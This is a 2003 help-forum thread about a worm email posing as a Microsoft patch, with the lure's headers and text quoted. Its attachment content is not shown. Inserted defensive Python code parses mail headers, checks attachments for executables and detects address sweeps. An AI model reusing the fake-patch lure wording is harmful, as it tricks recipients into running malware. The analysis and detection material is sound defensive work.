Virus Alert

Discussion in 'Computer Support' started by Cheekycharlie, Aug 29, 2003.

  1. Hi,
    I recently received this email with an attachment that had a virus attached
    to it.
    I'm not sure who it came from, but it certainly was not Microsoft.
    Can anyone here trace or track down who is sending these out and if so can
    anything be done about it?
    Thanks
    Michael
    Received: from cpe00d009ecf327-cm014100200957.cpe.net.cable.rogers.com
    ([24.157.151.57] helo=localhost)
    by lutetium.btinternet.com with smtp (Exim 3.22 #23)
    id 19sokI-0000Ws-00
    for ; Fri, 29 Aug 2003 20:17:18 +0100
    From: "Microsoft" <>
    To: <>
    Subject: Use this patch immediately !
    MIME-Version: 1.0
    Content-Type: multipart/mixed;boundary="xxxx"
    Message-Id: <>
    Date: Fri, 29 Aug 2003 20:17:18 +0100
    Status:

    --xxxx
    Content-Type: text/plain;
    Content-Transfer-Encoding: 7bit

    Dear friend , use this Internet Explorer patch now!
    There are dangerous virus in the Internet now!
    More than 500.000 already infected!

    --xxxx
    Content-Type: application/download
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename=patch.zl9


    --xxxx




    ---
    Outgoing mail is certified Virus Free.
    Checked by AVG anti-virus system (http://www.grisoft.com).
    Version: 6.0.514 / Virus Database: 312 - Release Date: 28/08/2003
    Cheekycharlie, Aug 29, 2003
    #1

  2. Cheekycharlie

    Kraftee Guest

    Cheekycharlie wrote:
    > Hi,
    > I recently received this email with an attachment that had a virus
    > attached to it.
    > I'm not sure who it came from, but it certainly was not Microsoft.


    YAWN......

    Keep up at the back there....

    --
    B-)
    Life is pain.....
    Deal with it!!
    Kraftee, Aug 29, 2003
    #2

  3. Cheekycharlie

    Mara Guest

    On Fri, 29 Aug 2003 20:25:39 +0000 (UTC), Cheekycharlie wrote:

    >Hi,
    >I recently received this email with an attachment that had a virus attached
    >to it.


    What it is, is W32/Nugosh-A. Where it came from is Rogers Cable Inc. Report it
    to , and they'll handle it.

    "And please do not post virus code in 24HSHD again."

    --
    "Sufficiently advanced incompetence is indistinguishable
    from malice." -- Vernon Schryver
    Mara, Aug 29, 2003
    #3
  4. Cheekycharlie

    why? Guest

    On Fri, 29 Aug 2003 20:25:39 +0000 (UTC), Cheekycharlie wrote:

    Argh not another one....... your subject line is crap, 'Virus Alert'.
    You are not posting a virus alert, you are really asking 'Is this virus
    alert email real or a hoax?'

    Think about this, Microsoft sending out software with a virus? Wouldn't
    be the first time however.

    >Hi,
    >I recently received this email with an attachment that had a virus attached
    >to it.
    >I'm not sure who it came from, but it certainly was not Microsoft.
    >Can anyone here trace or track down who is sending these out and if so can
    >anything be done about it?
    >Thanks
    >Michael
    >Received: from cpe00d009ecf327-cm014100200957.cpe.net.cable.rogers.com
    >([24.157.151.57] helo=localhost)
    > by lutetium.btinternet.com with smtp (Exim 3.22 #23)
    > id 19sokI-0000Ws-00
    > for ; Fri, 29 Aug 2003 20:17:18 +0100
    >From: "Microsoft" <>


    <snip>

    http://www.microsoft.com/security/
    see the link
    NOTICE: Microsoft never distributes software through e-mail

    Microsoft never distributes software directly via e-mail.
    * We distribute software on physical media like CD ROMs and floppy
    disks.
    * We distribute upgrades via the Internet. When we do this, the
    software will be available via our web site, http://www.microsoft.com,
    or through http://www.microsoft.com/downloads/search.asp?.
    * We occasionally send e-mail to customers to inform them that
    upgrades are available. However, the e-mail will only provide links to
    the download sites -- we will never attach the software itself to the
    e-mail. The links will always lead to either our web site or our FTP
    site, never to a third-party site.

    Me
    why?, Aug 29, 2003
    #4
  5. Cheekycharlie

    why? Guest

    X-No-Archive: Yes
    On Fri, 29 Aug 2003 20:25:39 +0000 (UTC), Cheekycharlie wrote:

    Ha Ha what a joke, the virus code renamed .zl9 by ZoneAlarm then the
    bottom of the post says it's virus free.......

    >Hi,
    >I recently received this email with an attachment that had a virus attached
    >to it.
    >I'm not sure who it came from, but it certainly was not Microsoft.

    <snip>
    >Dear friend , use this Internet Explorer patch now!
    >There are dangerous virus in the Internet now!
    >More than 500.000 already infected!
    >
    >--xxxx
    >Content-Type: application/download
    >Content-Transfer-Encoding: base64
    >Content-Disposition: attachment; filename=patch.zl9

    <snip the crap>
    >Outgoing mail is certified Virus Free.
    >Checked by AVG anti-virus system (http://www.grisoft.com).
    >Version: 6.0.514 / Virus Database: 312 - Release Date: 28/08/2003
    >

    So AVG missed this then.....

    Me
    why?, Aug 29, 2003
    #5
  6. No actually Avg saved it!
    And anyway if you know so much about this virus, which I don't suppose you
    do, why didn't you reply with a half decent answer.
    I know that Microsoft didn't send this virus, and I know now who did, but no
    thanks to you.
    All praise goes to MARA!
    CC:)
    "why?" <fgrirp*sgc@VAINY!Qznq.fpvragvfg.pbz> wrote in message
    news:...
    > X-No-Archive: Yes
    > On Fri, 29 Aug 2003 20:25:39 +0000 (UTC), Cheekycharlie wrote:
    >
    > Ha Ha what a joke, the virus code renamed .zl9 by ZoneAlarm then the
    > bottom of the post says it's virus free.......
    >
    > >Hi,
    > >I recently received this email with an attachment that had a virus attached
    > >to it.
    > >I'm not sure who it came from, but it certainly was not Microsoft.

    > <snip>
    > >Dear friend , use this Internet Explorer patch now!
    > >There are dangerous virus in the Internet now!
    > >More than 500.000 already infected!
    > >
    > >--xxxx
    > >Content-Type: application/download
    > >Content-Transfer-Encoding: base64
    > >Content-Disposition: attachment; filename=patch.zl9

    > <snip the crap>
    > >Outgoing mail is certified Virus Free.
    > >Checked by AVG anti-virus system (http://www.grisoft.com).
    > >Version: 6.0.514 / Virus Database: 312 - Release Date: 28/08/2003
    > >

    > So AVG missed this then.....
    >
    > Me



    ---
    Outgoing mail is certified Virus Free.
    Checked by AVG anti-virus system (http://www.grisoft.com).
    Version: 6.0.514 / Virus Database: 312 - Release Date: 28/08/2003
    Cheekycharlie, Aug 29, 2003
    #6
  7. Cheekycharlie

    Buffalo Guest

    Sure looks like it did.


    > Ha Ha what a joke, the virus code renamed .zl9 by ZoneAlarm then the
    > bottom of the post says it's virus free.......
    > So AVG missed this then.....
    >
    > Me
    Buffalo, Aug 29, 2003
    #7
  8. Cheekycharlie

    Buffalo Guest

    "Cheekycharlie" ...
    > No actually Avg saved it!
    > And anyway if you know so much about this virus, which I don't suppose you
    > do, why didn't you reply with a half decent answer.
    > I know that Microsoft didn't send this virus, and I know now who did, but no
    > thanks to you.
    > All praise goes to MARA!
    > CC:)

    It really sounds like ZoneAlarm found it first (saving it immediately) and
    renamed the ext (.exe) to .zl9 so that you couldn't have opened it unless
    you went through several 'Are you really sure you want to open this' type
    warnings from ZA.
    And, as Mara says:
    "And please do not post virus code in 24HSHD again."
    BTW, when you have a question like this, you can usually find the answer
    quickly yourself by using a search engine like Google.
    Buffalo, Aug 29, 2003
    #8
  9. Cheekycharlie

    Buffalo Guest

    BTW Cheekycharlie, never post your real e-mail addy in a newsgroup like you
    did when you posted the contents of your email unless you really want a lot
    more SPAM.

    "Buffalo"...
    >
    Buffalo, Aug 29, 2003
    #9
  10. Cheekycharlie

    why? Guest

    On Fri, 29 Aug 2003 21:47:50 +0000 (UTC), Cheekycharlie wrote:

    >No actually Avg saved it!


    AVG uses .zl9 extensions? That's ZoneAlarm. It's a very simple base 64
    encode and your software still said it was virus free and let you post
    it, go figure.

    >And anyway if you know so much about this virus, which I don't suppose you


    What the virus is does not matter, besides information has been posted
    about it on so many sites (McAfee, Symantec bulletins) and other
    threads. Any mail like this should be simply ignored and deleted, or the AV
    vendor sites checked.

    >do, why didn't you reply with a half decent answer.


    It was too easy?

    >I know that Microsoft didn't send this virus, and I know now who did, but no
    >thanks to you.


    That's really nice.

    <snip>


    So you couldn't see the one line then, that started - Received: from.

    Received: from cpe00d009ecf327-cm014100200957.cpe.net.cable.rogers.com
    ([24.157.151.57] helo=localhost)


    >CC:)
    >"why?" <fgrirp*sgc@VAINY!Qznq.fpvragvfg.pbz> wrote in message
    >news:...
    >> X-No-Archive: Yes
    >> On Fri, 29 Aug 2003 20:25:39 +0000 (UTC), Cheekycharlie wrote:
    >>
    >> Ha Ha what a joke, the virus code renamed .zl9 by ZoneAlarm then the
    >> bottom of the post says it's virus free.......
    >>
    >> >Hi,
    >> >I recently received this email with an attachment that had a virus attached
    >> >to it.
    >> >I'm not sure who it came from, but it certainly was not Microsoft.

    >> <snip>


    <snip>

    Me
    why?, Aug 29, 2003
    #10
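Added example, not part of any poster's message: Python code for the two checks the replies above rely on, reading the topmost `Received:` line to see which host actually connected, and decoding the base64 attachment to see what it is regardless of its `.zl9` name. The sample message is constructed from the headers quoted in the thread; the attachment is a harmless stub, the `example.invalid` addresses are placeholders, and all function names are hypothetical.

```python
import base64
import re
import struct
from email import message_from_string

# Constructed, harmless 68-byte stub: an "MZ" DOS header whose e_lfanew field
# (offset 0x3C) points at a "PE\0\0" signature. It is not the posted payload.
STUB = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64) + b"PE\x00\x00"

# Constructed message. Header values are the ones quoted in the thread; the
# two example.invalid addresses stand in for the blanked-out originals.
SAMPLE = "\n".join([
    "Received: from cpe00d009ecf327-cm014100200957.cpe.net.cable.rogers.com",
    "\t([24.157.151.57] helo=localhost)",
    "\tby lutetium.btinternet.com with smtp (Exim 3.22 #23)",
    "\tid 19sokI-0000Ws-00",
    "\tfor <recipient@example.invalid>; Fri, 29 Aug 2003 20:17:18 +0100",
    'From: "Microsoft" <sender@example.invalid>',
    "Subject: Use this patch immediately !",
    "MIME-Version: 1.0",
    'Content-Type: multipart/mixed;boundary="xxxx"',
    "",
    "--xxxx",
    "Content-Type: text/plain;",
    "Content-Transfer-Encoding: 7bit",
    "",
    "Dear friend , use this Internet Explorer patch now!",
    "",
    "--xxxx",
    "Content-Type: application/download",
    "Content-Transfer-Encoding: base64",
    "Content-Disposition: attachment; filename=patch.zl9",
    "",
    base64.b64encode(STUB).decode("ascii"),
    "",
    "--xxxx--",
    "",
])

# Exim-style trace line as quoted in the thread:
#   from <name> ([<peer ip>] helo=<name the client claimed>) by <server> ...
RECEIVED_RE = re.compile(
    r"from\s+(?P<name>\S+)\s+\(\[(?P<ip>[0-9A-Fa-f.:]+)\]\s+"
    r"helo=(?P<helo>[^)\s]+)\)\s+by\s+(?P<by>\S+)"
)


def delivering_hop(msg):
    """Parse the topmost Received header, the one stamped by the recipient's
    own mail server. Headers below it arrived with the message and may be
    forged, so they are ignored here. Returns None if the format differs."""
    headers = msg.get_all("Received") or []
    if not headers:
        return None
    unfolded = " ".join(headers[0].split())  # undo header line folding
    match = RECEIVED_RE.search(unfolded)
    if match is None:
        return None
    hop = match.groupdict()
    # The HELO name is whatever the client chose to say; the IP is the peer
    # the server saw. A mismatch is a hint, the IP is what gets reported.
    hop["helo_matches_name"] = hop["helo"].lower() == hop["name"].lower()
    return hop


def looks_like_pe(data):
    """True if data starts with a DOS 'MZ' header that points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage_attachments(msg):
    """Decode every named part and classify it by content, not by file name
    or declared MIME type. Nothing is written to disk or executed."""
    findings = []
    for part in msg.walk():
        name = part.get_filename()
        if name is None:
            continue
        data = part.get_payload(decode=True) or b""
        findings.append({
            "filename": name,
            "declared_type": part.get_content_type(),
            "size": len(data),
            "is_pe": looks_like_pe(data),
        })
    return findings


def triage(raw_message):
    """Run both checks on a raw RFC 822 message string."""
    msg = message_from_string(raw_message)
    return {"hop": delivering_hop(msg), "attachments": triage_attachments(msg)}


if __name__ == "__main__":
    print(triage(SAMPLE))
```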
  11. Cheekycharlie

    Mara Guest

    On Fri, 29 Aug 2003 22:39:48 GMT, why? wrote:

    >
    >On Fri, 29 Aug 2003 21:47:50 +0000 (UTC), Cheekycharlie wrote:
    >
    >>No actually Avg saved it!

    >
    >AVG uses .zl9 extensions? That's ZoneAlarm. It's a very simple base 64
    >encode and your software still said it was virus free and let you post
    >it, go figure.
    >
    >>And anyway if you know so much about this virus, which I don't suppose you

    >
    >What the virus is does not matter, besides information has been posted
    >about it on so many sites (McAfee, Symantec bulletins) and other
    >threads. Any mail like this should be simply ignored and deleted, or the AV
    >vendor sites checked.


    Well, actually, it _should_ be reported so the host can insist that the sending
    machine be cleaned up. That's of course assuming that the host actually cares;
    there are still machines spewing Nimda, CodeRed and the like about, with hosts
    knowing and not doing anything about it. Perhaps it's not so odd that the hosts
    in question generally have...other problems, as well.

    "If you know what I mean."

    <snip>

    --
    "Sufficiently advanced incompetence is indistinguishable
    from malice." -- Vernon Schryver
    Mara, Aug 30, 2003
    #11
  12. Cheekycharlie

    why? Guest

    X-No-Archive: Yes
    On Fri, 29 Aug 2003 23:01:47 -0500, Mara wrote:

    >On Fri, 29 Aug 2003 22:39:48 GMT, why? wrote:
    >
    >>
    >>On Fri, 29 Aug 2003 21:47:50 +0000 (UTC), Cheekycharlie wrote:
    >>
    >>>No actually Avg saved it!

    >>
    >>AVG uses .zl9 extensions? That's ZoneAlarm. It's a very simple base 64
    >>encode and your software still said it was virus free and let you post
    >>it, go figure.
    >>
    >>>And anyway if you know so much about this virus, which I don't suppose you

    >>
    >>What the virus is does not matter, besides information has been posted
    >>about it on so many sites (McAfee, Symantec bulletins) and other
    >>threads. Any mail like this should be simply ignored and deleted, or the AV
    >>vendor sites checked.

    >
    >Well, actually, it _should_ be reported so the host can insist that the sending
    >machine be cleaned up. That's of course assuming that the host actually cares;


    I see that point of course, but someone could spend weeks sending
    reports in and more arrives from new addresses. It's about time the ISPs
    took a lot more of this on, it only takes 1 report to disable an account
    while the PC is cleaned and proved to be so (difficult but not
    impossible).

    I would even pay extra to the ISP if they had good anti spam / anti worm
    policy, after all the end user is only the one that gets hit by whatever
    is spreading around. To get to the end user's PC however it had to go
    through the ISP systems.

    >there are still machines spewing Nimda, CodeRed and the like about, with hosts


    I still see these (sometimes) in my packet capture logs. Right now
    (rather for the last 2 weeks ) the broadcasts (ARPs) have risen from a
    few Kbits to constant 18-30Kbits/sec on the activity light on the cable
    modem.

    If I can tell in a minute or two one (or a hundred) PC(s) are searching
    for addresses
    x.x.x.1 x.x.x.2 x.x.x.3 etc.

    Then it's not beyond the ISP ability to say why is a PC scanning
    consecutive addresses. Why is it up to the end user to block these
    because hundreds of other non savvy users don't have firewalls, AV anti
    spam measures?

    Surely the ISP could give the users a short reminder about spam,
    Usenet munge, AV etc. when joining and any PC (my ISP runs an open port
    scanner against user PCs) must have at least basic protection if you
    want to connect out (ISPs) network.

    >knowing and not doing anything about it. Perhaps it's not so odd that the hosts
    >in question generally have...other problems, as well.


    Like an unpatched MS OS :)

    <snip>

    Me
    why?, Aug 30, 2003
    #12
  13. Cheekycharlie

    Mara Guest

    On Sat, 30 Aug 2003 11:10:58 GMT, why? wrote:

    >X-No-Archive: Yes
    >On Fri, 29 Aug 2003 23:01:47 -0500, Mara wrote:
    >
    >>On Fri, 29 Aug 2003 22:39:48 GMT, why? wrote:
    >>
    >>>
    >>>On Fri, 29 Aug 2003 21:47:50 +0000 (UTC), Cheekycharlie wrote:
    >>>
    >>>>No actually Avg saved it!
    >>>
    >>>AVG uses .zl9 extensions? That's ZoneAlarm. It's a very simple base 64
    >>>encode and your software still said it was virus free and let you post
    >>>it, go figure.
    >>>
    >>>>And anyway if you know so much about this virus, which I don't suppose you
    >>>
    >>>What the virus is does not matter, besides information has been posted
    >>>about it on so many sites (McAfee, Symantec bulletins) and other
    >>>threads. Any mail like this should be simply ignored and deleted, or the AV
    >>>vendor sites checked.

    >>
    >>Well, actually, it _should_ be reported so the host can insist that the sending
    >>machine be cleaned up. That's of course assuming that the host actually cares;

    >
    >I see that point of course, but someone could spend weeks sending
    >reports in and more arrives from new addresses. It's about time the ISPs
    >took a lot more of this on, it only takes 1 report to disable an account
    >while the PC is cleaned and proved to be so (difficult but not
    >impossible).


    I agree. But in the end, the luser is responsible for his own system and should
    at least be knowledgeable enough, before he ever connects, to be able to take
    steps to protect himself from the kind of garbage that's floating around today.
    There is no excuse not to, really; the information is readily available. But
    there is a lot the hosts can be doing, too. Some do - mine does - but some
    don't. And even though it's hard to believe, in this day and age, there are
    hosts who simply do not know _how_ to deal with this. There are a great many who
    appear to be only "in it for the bucks" and don't care whether their clients,
    and thus their network, is spewing. It may sound cynical, but it isn't; it's
    reality.

    Personally, I pull the plug. No clean, no account. End of discussion.

    >
    >I would even pay extra to the ISP if they had good anti spam / anti worm
    >policy, after all the end user is only the one that gets hit by whatever
    >is spreading around. To get to the end user's PC however it had to go
    >through the ISP systems.


    Mine does. It uses SpamAssassin. And I don't have to pay extra. Of course I'm
    personally behind a NAT router, too, which helps on some stuff.

    It's a shame that Joe Jared has shut up shop. relays.osirusoft.com made a
    difference. But after six weeks of being continually DoSsed in a spite move by a
    spammer, I can see why he burned out. There have been times lately when I've
    felt pretty much the same way myself.

    >
    >>there are still machines spewing Nimda, CodeRed and the like about, with hosts

    >
    >I still see these (sometimes) in my packet capture logs. Right now
    >(rather for the last 2 weeks ) the broadcasts (ARPs) have risen from a
    >few Kbits to constant 18-30Kbits/sec on the activity light on the cable
    >modem.
    >
    >If I can tell in a minute or two one (or a hundred) PC(s) are searching
    >for addresses
    >x.x.x.1 x.x.x.2 x.x.x.3 etc.


    This morning, I am seeing massive connection attempts, mainly from one machine
    on he.net (Hurricane Electric.) This comes as no surprise; they have quite a
    reputation in my world, and it isn't a good one. Since Sobig is also being used
    as a spamming vector from what I read, this is rather expected. Slime is
    everywhere, these days.

    Ho hum.

    >Then it's not beyond the ISP ability to say why is a PC scanning
    >consecutive addresses. Why is it up to the end user to block these
    >because hundreds of other non savvy users don't have firewalls, AV anti
    >spam measures?


    The host may not even be aware of it. Not all check their logs, sorry to say.

    In the end, it is the luser's responsibility. I say this because the host does
    not own the machine the luser is using; the luser does, and as such, it is his
    equipment and his responsibility. Those same rules apply to hosts, of course,
    but no one can do everything, and there are only so many hours in the day. The
    key is education, both in groups like this one and with hosts. But as in all
    things, there are some who learn, and some who don't; some who want to, and some
    who won't.

    In the end, there is only one real truth to being online.

    "My network (my machine,) my rules."

    Therefore, what happens on my LAN, or my machine, is _my_ responsibility.
    Whether I have 20 users or two million, or two. Or whether I own a single
    machine that I use to connect through another host. I can't control what someone
    else allows into their machine, because it's their machine, but I _can_ see to
    it that if they're on my WAN and signed my AUP/TOS and they're infected, that
    they're shut down until they're cleaned. If I have 2 million users, though, I'm
    not going to be able to check each and every one; that's simply humanly
    impossible. That's where the complaints come in. They are _necessary_. Because
    some of us _do_ care and will take immediate steps.

    I'm probably not making much sense at this point, but it's been a very long
    week, and I'm very tired.

    >
    >Surely the ISP could give the users a short reminder about spam,
    >Usenet munge, AV etc. when joining and any PC (my ISP runs an open port
    >scanner against user PCs) must have at least basic protection if you
    >want to connect out (ISPs) network.


    They should, and mine does, but not everyone cares, and not all users retain
    information or care themselves.

    >
    >>knowing and not doing anything about it. Perhaps it's not so odd that the hosts
    >>in question generally have...other problems, as well.

    >
    >Like an unpatched MS OS :)


    Yes. In fact, from my end, that's _most_ of the problem.

    "Well, that and hosts that don't educate, and lusers that refuse to educate
    themselves - neither of which do I understand, since the information is so very
    readily available for _everyone._"

    >
    ><snip>
    >
    >Me


    --
    "Sufficiently advanced incompetence is indistinguishable
    from malice." -- Vernon Schryver
    Mara, Aug 30, 2003
    #13
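
The consecutive-address probing described in the quoted text above (x.x.x.1, x.x.x.2, x.x.x.3) can be picked out of a capture log automatically. This is an added example, not code from any poster in the thread; the tcpdump-style log lines, the documentation addresses and the threshold of five are constructed assumptions, and timing between probes is ignored.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: tcpdump-style ARP request lines (documentation addresses).
SAMPLE = """\
09:14:01.100000 ARP, Request who-has 192.0.2.1 tell 192.0.2.77, length 46
09:14:01.150000 ARP, Request who-has 192.0.2.2 tell 192.0.2.77, length 46
09:14:01.180000 ARP, Request who-has 192.0.2.254 tell 192.0.2.10, length 46
09:14:01.200000 ARP, Request who-has 192.0.2.3 tell 192.0.2.77, length 46
09:14:01.260000 ARP, Request who-has 192.0.2.4 tell 192.0.2.77, length 46
09:14:01.300000 ARP, Request who-has 192.0.2.5 tell 192.0.2.77, length 46
09:14:02.000000 ARP, Request who-has 192.0.2.1 tell 192.0.2.10, length 46
09:14:05.000000 ARP, Request who-has 192.0.2.9 tell 192.0.2.10, length 46
"""

ARP_RE = re.compile(r"ARP, Request who-has (\S+) tell ([0-9.]+)")

def longest_run(addrs):
    """Length of the longest run of consecutive integers in a set."""
    best = 0
    for a in addrs:
        if a - 1 not in addrs:          # a is the start of a run
            n = 1
            while a + n in addrs:
                n += 1
            best = max(best, n)
    return best

def find_sweepers(lines, min_run=5):
    """Return {requester: longest consecutive run} for runs >= min_run."""
    targets = defaultdict(set)
    for line in lines:
        m = ARP_RE.search(line)
        if not m:
            continue                     # not an ARP request line
        try:
            target = int(ipaddress.IPv4Address(m.group(1)))
        except ipaddress.AddressValueError:
            continue                     # malformed target address, skip
        targets[m.group(2)].add(target)
    runs = {src: longest_run(t) for src, t in targets.items()}
    return {src: n for src, n in runs.items() if n >= min_run}

if __name__ == "__main__":
    for src, n in find_sweepers(SAMPLE.splitlines()).items():
        print(f"{src} probed {n} consecutive addresses")
```

A host that ARPs for its gateway and a couple of scattered neighbours stays below the threshold; only the requester walking the subnet in order is reported.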
  14. Cheekycharlie

    why? Guest

    X-No-Archive: Yes
    On Sat, 30 Aug 2003 09:40:33 -0500, Mara wrote:

    Hi,

    >On Sat, 30 Aug 2003 11:10:58 GMT, why? wrote:
    >
    >>X-No-Archive: Yes
    >>On Fri, 29 Aug 2003 23:01:47 -0500, Mara wrote:
    >>
    >>>On Fri, 29 Aug 2003 22:39:48 GMT, why? wrote:
    >>>
    >>>>
    >>>>On Fri, 29 Aug 2003 21:47:50 +0000 (UTC), Cheekycharlie wrote:
    >>>>
    >>>>>No actually Avg saved it!
    >>>>
    >>>>AVG uses .zl9 extensions? That's ZoneAlarm. It's a very simple base 64
    >>>>encode and your software still said it was virus free and let you post
    >>>>it, go figure.

    <snip>
    >>>>threads. Any mail like should be simply ignored and deleted, or the AV
    >>>>vendor sites checked.
    >>>
    >>>Well, actually, it _should_ be reported so the host can insist that the sending
    >>>machine be cleaned up. That's of course assuming that the host actually cares;

    >>
    >>I see that point of course, but someone could spend weeks sending
    >>reports in and more arrives from new addresses. It's about time the ISPs
    >>took a lot more of this on, it only takes 1 report to disable an account
    >>while the PC is cleaned and proved to be so (difficult but not
    >>impossible).

    >
    >I agree. But in the end, the luser is responsible for his own system and should
    >at least be knowledgeable enough, before he ever connects, to be able to take
    >steps to protect himself from the kind of garbage that's floating around today.
    >There is no excuse not to, really; the information is readily available. But
    >there is a lot the hosts can be doing, too. Some do - mine does - but some


    Sounds like work too much, I mean the Mon-Fri sort. We have been
    getting 'panic' messages in our nice multi bold, colored, mixed font
    red 1 " high 'STOP!! Action to perform'. To install the attached exe (MS
    patches) after having been told never to run attachments. Then after
    that is the same in 24HSHD at the weekends.

    >don't. And even though it's hard to believe, in this day and age, there are
    >hosts who simply do not know _how_ to deal with this. There are a great many who


    Add companies to 'hosts' :)

    <snip>

    >>I would even pay extra to the ISP if they had good anti spam / anti worm
    >>policy, after all the end user is only the one that gets hit by whatever
    >>is spreading around. To get to the end user's PC however it had to go
    >>through the ISP systems.

    >
    >Mine does. It uses SpamAssassin. And I don't have to pay extra. Of course I'm
    >personally behind a NAT router, too, which helps on some stuff.


    NAT router (home as well) and in case of a flaw, lack of update the PCs
    run mixed AV / FW from different places.

    Thanks for the heads up on SA, just had a look at the webpages, very
    interesting.

    >It's a shame that Joe Jared has shut up shop. relays.osirusoft.com made a
    >difference. But after six weeks of being continually DoSsed in a spite move by a
    >spammer, I can see why he burned out. There have been times lately when I've
    >felt pretty much the same way myself.
    >
    >>
    >>>there are still machines spewing Nimda, CodeRed and the like about, with hosts

    >>
    >>I still see these (sometimes) in my packet capture logs. Right now
    >>(rather for the last 2 weeks) the broadcasts (ARPs) have risen from a
    >>few Kbits to constant 18-30Kbits/sec on the activity light on the cable
    >>modem.
    >>
    >>If I can tell in a minute or two one (or a hundred) PC(s) are searching
    >>for addresses
    >>x.x.x.1 x.x.x.2 x.x.x.3 etc.

    >
    >This morning, I am seeing massive connection attempts, mainly from one machine
    >on he.net (Hurricane Electric.) This comes as no surprise; they have quite a

    <snip>

    >
    >In the end, there is only one real truth to being online.
    >
    >"My network (my machine,) my rules."


    Nice one, at work it's 'my network, company machine and you did what?'

    <snip>
    >they're shut down until they're cleaned. If I have 2 million users, though, I'm
    >not going to be able to check each and every one; that's simply humanly
    >impossible. That's where the complaints come in. They are _necessary_. Because
    >some of us _do_ care and will take immediate steps.
    >
    >I'm probably not making much sense at this point, but it's been a very long
    >week, and I'm very tired.


    Lots of sense.

    Thanks for the comprehensive reply.

    <snip>

    Me
    why?, Aug 30, 2003
    #14
  15. Cheekycharlie

    Mara Guest

    On Sat, 30 Aug 2003 18:05:49 GMT, why? wrote:

    <snip>
    >>I agree. But in the end, the luser is responsible for his own system and should
    >>at least be knowledgeable enough, before he ever connects, to be able to take
    >>steps to protect himself from the kind of garbage that's floating around today.
    >>There is no excuse not to, really; the information is readily available. But
    >>there is a lot the hosts can be doing, too. Some do - mine does - but some

    >
    >Sounds like work too much, I mean the Mon-Fri sort. We have been
    >getting 'panic' messages in our nice multi bold, colored, mixed font
    >red 1 " high 'STOP!! Action to perform'. To install the attached exe (MS
    >patches) after having been told never to run attachments. Then after
    >that is the same in 24HSHD at the weekends.


    No Mon-Fri here. I'm working my regular job, taking care of panicked lusers'
    systems, and working on my new home, by myself, when I get done with all that.
    I've had some 20+ hour days, lately. But I'll be moving soon, and that should
    make things a bit easier - except for the panicked lusers, of course.
    SpamAssassin doesn't stop Blaster. At least, not yet. And my router log is full
    of Sobig connection attempts.

    It's a great life, if you don't weaken. Or collapse.

    >
    >>don't. And even though it's hard to believe, in this day and age, there are
    >>hosts who simply do not know _how_ to deal with this. There are a great many who

    >
    >Add companies to 'hosts' :)


    I'd rather not, if you know what I mean. :(

    >
    ><snip>
    >
    >>>I would even pay extra to the ISP if they had good anti spam / anti worm
    >>>policy, after all the end user is only the one that gets hit by whatever
    >>>is spreading around. To get to the end user's PC however it had to go
    >>>through the ISP systems.

    >>
    >>Mine does. It uses SpamAssassin. And I don't have to pay extra. Of course I'm
    >>personally behind a NAT router, too, which helps on some stuff.

    >
    >NAT router (home as well) and in case of a flaw, lack of update the PCs
    >run mixed AV / FW from different places.


    I run three different updated AVs myself. And I keep my systems patched - to a
    point. I will not upgrade 2k beyond SP 2, but I do install the patches I can.

    >
    >Thanks for the heads up on SA, just had a look at the webpages, very
    >interesting.


    It's very good but it _is_ a bit of a resource hog, depending on how it's
    configured.

    <snip>
    >>In the end, there is only one real truth to being online.
    >>
    >>"My network (my machine,) my rules."

    >
    >Nice one, at work it's 'my network, company machine and you did what?'


    I'd rather have that than "I won't even breathe near it unless you say it's ok."
    That's flattering, but also a gigantic PITA.

    >
    ><snip>
    >>they're shut down until they're cleaned. If I have 2 million users, though, I'm
    >>not going to be able to check each and every one; that's simply humanly
    >>impossible. That's where the complaints come in. They are _necessary_. Because
    >>some of us _do_ care and will take immediate steps.
    >>
    >>I'm probably not making much sense at this point, but it's been a very long
    >>week, and I'm very tired.

    >
    >Lots of sense.
    >
    >Thanks for the comprehensive reply.


    You are welcome. :)


    >
    ><snip>
    >
    >Me


    --
    "Sufficiently advanced incompetence is indistinguishable
    from malice." -- Vernon Schryver
    Mara, Aug 30, 2003
    #15